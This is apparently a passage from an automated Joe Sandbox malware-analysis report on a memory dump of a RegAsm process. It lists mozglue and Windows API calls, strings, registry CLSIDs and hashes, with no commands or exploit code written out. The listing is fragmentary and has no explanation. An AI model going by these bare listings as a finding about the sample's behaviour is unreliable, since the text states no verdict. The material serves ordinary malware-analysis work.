                                                                                      • Part of subcall function 6C6C31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C6C32AB
                                                                                      • Part of subcall function 6C6C31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C6C32D1
                                                                                      • Part of subcall function 6C6C31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C6C32E5
                                                                                      • Part of subcall function 6C6C31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C6C32F7
                                                                                    • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C6D9675
                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6D9697
                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C6D96E8
                                                                                    • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C6D9707
                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6D971F
                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C6D9773
                                                                                    • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C6D97B7
                                                                                    • FreeLibrary.KERNEL32 ref: 6C6D97D0
                                                                                    • FreeLibrary.KERNEL32 ref: 6C6D97EB
                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C6D9824
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
                                                                                    • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                    • API String ID: 3361784254-3880535382
                                                                                    • Opcode ID: b525a9c2c097dd51bb3dfdfebbadf1e8d4e396d64627dcef197b2cf654e4f258
                                                                                    • Instruction ID: ad55362078f6335467255a896d4463890f8def57352523a6bd325e996c1d8f13
                                                                                    • Opcode Fuzzy Hash: b525a9c2c097dd51bb3dfdfebbadf1e8d4e396d64627dcef197b2cf654e4f258
                                                                                    • Instruction Fuzzy Hash: 6E61F071600205EFDF01EF79D994B9A7BB5EB8A31CF41C53AE92583B80DB34A844CB95
                                                                                    APIs
                                                                                    • memcpy.VCRUNTIME140(?,Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32,00000084), ref: 6C6D1213
                                                                                    • toupper.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C6D1285
                                                                                    • memcpy.VCRUNTIME140(?,TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32,00000076), ref: 6C6D12B9
                                                                                    • memcpy.VCRUNTIME140(?,CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32,00000078,?), ref: 6C6D1327
                                                                                    Strings
                                                                                    • TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32, xrefs: 6C6D12AD
                                                                                    • &, xrefs: 6C6D126B
                                                                                    • CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32, xrefs: 6C6D131B
                                                                                    • Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32, xrefs: 6C6D120D
                                                                                    • MZx, xrefs: 6C6D11E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memcpy$toupper
                                                                                    • String ID: &$CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32$Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32$MZx$TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32
                                                                                    • API String ID: 403083179-3658087426
                                                                                    • Opcode ID: 6c016c4a5ee13db3f915e2a4c6959bd74df8398f94cbc9f4c656e9ec2e591c99
                                                                                    • Instruction ID: b95f0f91d036ae1d487d2c435069410836ad6f87cefeaba4868f3fac3d9d0144
                                                                                    • Opcode Fuzzy Hash: 6c016c4a5ee13db3f915e2a4c6959bd74df8398f94cbc9f4c656e9ec2e591c99
                                                                                    • Instruction Fuzzy Hash: E271E571E057688ADB209FB4C8007DEB7F1BF4531DF06066AD545A3B40D7B4BA88CB9A
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C6C3217
                                                                                    • GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C6C3236
                                                                                    • FreeLibrary.KERNEL32 ref: 6C6C324B
                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6C3260
                                                                                    • ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C6C327F
                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6C328E
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C6C32AB
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C6C32D1
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C6C32E5
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C6C32F7
                                                                                      • Part of subcall function 6C6FAB89: EnterCriticalSection.KERNEL32(6C74E370,?,?,?,6C6C34DE,6C74F6CC,?,?,?,?,?,?,?,6C6C3284), ref: 6C6FAB94
                                                                                      • Part of subcall function 6C6FAB89: LeaveCriticalSection.KERNEL32(6C74E370,?,6C6C34DE,6C74F6CC,?,?,?,?,?,?,?,6C6C3284,?,?,6C6E56F6), ref: 6C6FABD1
                                                                                    • __aulldiv.LIBCMT ref: 6C6C346B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Time$StampV01@@Value@mozilla@@$CriticalLibrarySectionStamp@mozilla@@$AddressCreation@EnterFreeInit_thread_footerLeaveLoadNow@ProcProcessV12@V12@___aulldiv
                                                                                    • String ID: KernelBase.dll$QueryInterruptTime
                                                                                    • API String ID: 3006643210-2417823192
                                                                                    • Opcode ID: 5068efd82baf3c52f87cb72694caf34ddbb7265c898aa9775ba6a524fcc66700
                                                                                    • Instruction ID: e71e7116c8c0d03ec2fcf35ef7524cd4f2e3b07c9d009a2340ca80129f7bdaca
                                                                                    • Opcode Fuzzy Hash: 5068efd82baf3c52f87cb72694caf34ddbb7265c898aa9775ba6a524fcc66700
                                                                                    • Instruction Fuzzy Hash: 44611571A087418BC711DF38C45169AB3F5FFC6358F218B2EF8A5A3690DB349549CB4A
                                                                                    APIs
                                                                                    • InitializeCriticalSection.KERNEL32(6C74F618), ref: 6C726694
                                                                                    • GetThreadId.KERNEL32(?), ref: 6C7266B1
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7266B9
                                                                                    • memset.VCRUNTIME140(?,00000000,00000100), ref: 6C7266E1
                                                                                    • EnterCriticalSection.KERNEL32(6C74F618), ref: 6C726734
                                                                                    • GetCurrentProcess.KERNEL32 ref: 6C72673A
                                                                                    • LeaveCriticalSection.KERNEL32(6C74F618), ref: 6C72676C
                                                                                    • GetCurrentThread.KERNEL32 ref: 6C7267FC
                                                                                    • memset.VCRUNTIME140(?,00000000,000002C8), ref: 6C726868
                                                                                    • RtlCaptureContext.NTDLL ref: 6C72687F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
                                                                                    • String ID: WalkStack64
                                                                                    • API String ID: 2357170935-3499369396
                                                                                    • Opcode ID: bccb90e12aadbab6f0f7492c73387a922ef1ac0dc990ec23a9ea8c43f0f4407c
                                                                                    • Instruction ID: 16972640d5f7559be3bb6beff9d17ddc3deabb635238fa7394ad6d5a3d629b47
                                                                                    • Opcode Fuzzy Hash: bccb90e12aadbab6f0f7492c73387a922ef1ac0dc990ec23a9ea8c43f0f4407c
                                                                                    • Instruction Fuzzy Hash: F951BC71A09750AFD711DF25CA44A5EBBF4FF89718F00892EF59887640D774AA088B92
                                                                                    APIs
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C6D4A68), ref: 6C70945E
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C709470
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C709482
                                                                                      • Part of subcall function 6C709420: __Init_thread_footer.LIBCMT ref: 6C70949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70DE73
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70DF7D
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70DF8A
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70DFC9
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70DFF7
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C70E000
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C6D4A68), ref: 6C70DE7B
                                                                                      • Part of subcall function 6C7094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C7094EE
                                                                                      • Part of subcall function 6C7094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C709508
                                                                                      • Part of subcall function 6C6FCBE8: GetCurrentProcess.KERNEL32(?,6C6C31A7), ref: 6C6FCBF1
                                                                                      • Part of subcall function 6C6FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6C31A7), ref: 6C6FCBFA
                                                                                    • ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C6D4A68), ref: 6C70DEB8
                                                                                    • free.MOZGLUE(00000000,?,6C6D4A68), ref: 6C70DEFE
                                                                                    • ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C70DF38
                                                                                    Strings
                                                                                    • [I %d/%d] locked_profiler_stop, xrefs: 6C70DE83
                                                                                    • [I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6C70E00E
                                                                                    • <none>, xrefs: 6C70DFD7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
                                                                                    • String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
                                                                                    • API String ID: 1281939033-809102171
                                                                                    • Opcode ID: 385e83b13a173e6f72251648ba785834e1820427cab343ff9893d7ad8f9e8096
                                                                                    • Instruction ID: 9ec4270be59c37a0b758861dd5a2e9c6594712f47fb42a868a4e0b4d83b738f5
                                                                                    • Opcode Fuzzy Hash: 385e83b13a173e6f72251648ba785834e1820427cab343ff9893d7ad8f9e8096
                                                                                    • Instruction Fuzzy Hash: BD4109B17016109BDB10AF69D908BAE77B5EF9631CF048037E93587B01CB70A805CBE9
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71D85F
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C71D86C
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C71D918
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71D93C
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C71D948
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C71D970
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71D976
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C71D982
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C71D9CF
                                                                                    • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C71DA2E
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71DA6F
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C71DA78
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE ref: 6C71DA91
                                                                                      • Part of subcall function 6C6E5C50: GetTickCount64.KERNEL32 ref: 6C6E5D40
                                                                                      • Part of subcall function 6C6E5C50: EnterCriticalSection.KERNEL32(6C74F688), ref: 6C6E5D67
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C71DAB7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Count64CriticalEnterSectionStampTickTimeV01@@Value@mozilla@@Xbad_function_call@std@@
                                                                                    • String ID:
                                                                                    • API String ID: 1195625958-0
                                                                                    • Opcode ID: d66b34990fe97c654536815a8e8713f26e001d2b13eef5abdb5cc64ce8725bb0
                                                                                    • Instruction ID: a3bd0fe96158c45040908a0cbcf4b337e30eac01e029439cb16a685592c9e0c2
                                                                                    • Opcode Fuzzy Hash: d66b34990fe97c654536815a8e8713f26e001d2b13eef5abdb5cc64ce8725bb0
                                                                                    • Instruction Fuzzy Hash: 35718C756043049FCB00DF29C488A9EBBF5FF89318F19857AE85A9B741DB30A944CF95
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71D4F0
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C71D4FC
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C71D52A
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71D530
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C71D53F
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C71D55F
                                                                                    • free.MOZGLUE(00000000), ref: 6C71D585
                                                                                    • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C71D5D3
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71D5F9
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C71D605
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C71D652
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71D658
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C71D667
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C71D6A2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
                                                                                    • String ID:
                                                                                    • API String ID: 2206442479-0
                                                                                    • Opcode ID: 036847fc991d029ee78dac5014e893516ddf79ef205920a6ff4a31580a4eb68e
                                                                                    • Instruction ID: ed743a9d3aa71a2f54acf286d465d6fdb9adbd0d137bec5ba67b7ad28e5c64d7
                                                                                    • Opcode Fuzzy Hash: 036847fc991d029ee78dac5014e893516ddf79ef205920a6ff4a31580a4eb68e
                                                                                    • Instruction Fuzzy Hash: 4A516B71608B05DFC704DF35C488A9ABBB4FF89358F10862EE95A87B11DB30B945CB95
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(6C74E784), ref: 6C6C1EC1
                                                                                    • LeaveCriticalSection.KERNEL32(6C74E784), ref: 6C6C1EE1
                                                                                    • EnterCriticalSection.KERNEL32(6C74E744), ref: 6C6C1F38
                                                                                    • LeaveCriticalSection.KERNEL32(6C74E744), ref: 6C6C1F5C
                                                                                    • VirtualFree.KERNEL32(?,00100000,00004000), ref: 6C6C1F83
                                                                                    • LeaveCriticalSection.KERNEL32(6C74E784), ref: 6C6C1FC0
                                                                                    • EnterCriticalSection.KERNEL32(6C74E784), ref: 6C6C1FE2
                                                                                    • LeaveCriticalSection.KERNEL32(6C74E784), ref: 6C6C1FF6
                                                                                    • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C6C2019
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Leave$Enter$FreeVirtualmemset
                                                                                    • String ID: Dtl$Dtl$MOZ_CRASH()$\tl
                                                                                    • API String ID: 2055633661-3369011757
                                                                                    • Opcode ID: aac9c0c255ef872f0fb9210f0180a7a1ed8a1bdefdba3fdcea91ead9d4cc62a6
                                                                                    • Instruction ID: 1c57c27373eb5abb3ccbbab006c56787c9a9ceefc515204ab0bff7d77f3e677e
                                                                                    • Opcode Fuzzy Hash: aac9c0c255ef872f0fb9210f0180a7a1ed8a1bdefdba3fdcea91ead9d4cc62a6
                                                                                    • Instruction Fuzzy Hash: C141D375B043198BDB01EF78C888BAE7AB5EB4A36CF008136E92597741D77098048BDA
                                                                                    APIs
                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6C6E56D1
                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6E56E9
                                                                                    • ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6C6E56F1
                                                                                    • ?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C6E5744
                                                                                    • ??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6C6E57BC
                                                                                    • GetTickCount64.KERNEL32 ref: 6C6E58CB
                                                                                    • EnterCriticalSection.KERNEL32(6C74F688), ref: 6C6E58F3
                                                                                    • __aulldiv.LIBCMT ref: 6C6E5945
                                                                                    • LeaveCriticalSection.KERNEL32(6C74F688), ref: 6C6E59B2
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6C74F638,?,?,?,?), ref: 6C6E59E9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
                                                                                    • String ID: MOZ_APP_RESTART
                                                                                    • API String ID: 2752551254-2657566371
                                                                                    • Opcode ID: bf5fe81da4ac9328b0c1990d27f88234a2b11cbdc5679bdacd30c5a3d2970416
                                                                                    • Instruction ID: 7c5ef53c19e88c689e8a266a4bd1ef59d8ffb1614a7f17b8dd0a82900e5908c4
                                                                                    • Opcode Fuzzy Hash: bf5fe81da4ac9328b0c1990d27f88234a2b11cbdc5679bdacd30c5a3d2970416
                                                                                    • Instruction Fuzzy Hash: 6BC16E31A0D7909FD705DF28C44066AB7F1BFDA718F15CA2EE8C497661D730A885CB86
                                                                                    APIs
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C6D4A68), ref: 6C70945E
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C709470
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C709482
                                                                                      • Part of subcall function 6C709420: __Init_thread_footer.LIBCMT ref: 6C70949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70EC84
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C70EC8C
                                                                                      • Part of subcall function 6C7094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C7094EE
                                                                                      • Part of subcall function 6C7094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C709508
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70ECA1
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70ECAE
                                                                                    • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C70ECC5
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70ED0A
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C70ED19
                                                                                    • CloseHandle.KERNEL32(?), ref: 6C70ED28
                                                                                    • free.MOZGLUE(00000000), ref: 6C70ED2F
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70ED59
                                                                                    Strings
                                                                                    • [I %d/%d] profiler_ensure_started, xrefs: 6C70EC94
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                                    • String ID: [I %d/%d] profiler_ensure_started
                                                                                    • API String ID: 4057186437-125001283
                                                                                    • Opcode ID: f00c97e8907704670805d45a7887885aae5b20e7800d1081527216a1d5dea891
                                                                                    • Instruction ID: bd9597307a97e456805fa6d432688136a59072f5944d90b758402495094f08b5
                                                                                    • Opcode Fuzzy Hash: f00c97e8907704670805d45a7887885aae5b20e7800d1081527216a1d5dea891
                                                                                    • Instruction Fuzzy Hash: 0F21F9B57005189BDF00AF68D909EAA77B9EF8636CF108232FC2857741DB31AC05CBA5
                                                                                    APIs
                                                                                    • IsDebuggerPresent.KERNEL32 ref: 6C726009
                                                                                    • ??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C726024
                                                                                    • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(Qll,?), ref: 6C726046
                                                                                    • OutputDebugStringA.KERNEL32(?,Qll,?), ref: 6C726061
                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C726069
